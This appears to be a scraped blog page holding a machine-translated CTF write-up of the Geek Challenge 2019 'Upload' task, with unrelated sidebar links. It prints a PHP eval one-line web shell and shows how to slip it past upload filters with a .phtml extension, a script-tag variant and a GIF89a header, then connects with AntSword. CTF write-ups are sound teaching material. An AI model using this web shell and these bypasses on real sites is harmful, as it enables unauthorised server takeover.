当前位置:网站首页>[geek challenge 2019] upload
[geek challenge 2019] upload
2022-07-02 11:59:00 【With stars in your eyes】
After opening, there is a file upload question , First upload a php File try
In a word, the contents of the Trojan horse file are <?php eval($_POST['hhh']);?>
The prompt is not a picture
Preliminary guess is to modify Content-Type, Try to grab a bag
Use burpsuite Grab the bag
But it still shows
Try to modify php suffix
".php" Equivalent extension :
".php5",".php4",".php3",".php2","php1",".html",".htm",".phtml"
The first few failed
But try .phtml when , There's a difference , The contents of the original document cannot include '<?'
Modify the document to <script language="php">eval($_POST['hhh'])</script>, It works the same , But show Dont't lie to me,it's not image at all!!!
Later inquiry , It turns out that you need to write a picture file header , Modify the document to GIF89a? <script language="php">eval($_POST['hhh'])</script>, Upload successful !
Then find the file path , Be in commonly upload In the folder , Try typing , As expected And find the file we uploaded
Then connect it with an ant sword
Successful connection
Find it here flag
Click to enter
边栏推荐
- Yygh-9-make an appointment to place an order
- Some problems encountered in introducing lvgl into esp32 Arduino
- to_bytes与from_bytes简单示例
- This article takes you to understand the operation of vim
- How to Create a Nice Box and Whisker Plot in R
- Larvel modify table fields
- Dynamic debugging of multi file program x32dbg
- Principe du contrat évolutif - delegatecall
- HOW TO EASILY CREATE BARPLOTS WITH ERROR BARS IN R
- Flesh-dect (media 2021) -- a viewpoint of material decomposition
猜你喜欢
A sharp tool for exposing data inconsistencies -- a real-time verification system
Cluster Analysis in R Simplified and Enhanced
Power Spectral Density Estimates Using FFT---MATLAB
小程序链接生成
HOW TO ADD P-VALUES TO GGPLOT FACETS
HOW TO CREATE AN INTERACTIVE CORRELATION MATRIX HEATMAP IN R
What is the relationship between digital transformation of manufacturing industry and lean production
HOW TO CREATE A BEAUTIFUL INTERACTIVE HEATMAP IN R
【2022 ACTF-wp】
Larvel modify table fields
随机推荐
C#基于当前时间,获取唯一识别号(ID)的方法
Power Spectral Density Estimates Using FFT---MATLAB
YYGH-BUG-05
进入前六!博云在中国云管理软件市场销量排行持续上升
File operation (detailed!)
YYGH-9-预约下单
Bedtools tutorial
GGPlot Examples Best Reference
Seriation in R: How to Optimally Order Objects in a Data Matrice
R HISTOGRAM EXAMPLE QUICK REFERENCE
ESP32 Arduino 引入LVGL 碰到的一些问题
deepTools对ChIP-seq数据可视化
Time format display
YYGH-BUG-04
Seriation in R: How to Optimally Order Objects in a Data Matrice
Thesis translation: 2022_ PACDNN: A phase-aware composite deep neural network for speech enhancement
How to Add P-Values onto Horizontal GGPLOTS
Implementation of address book (file version)
小程序链接生成
Log4j2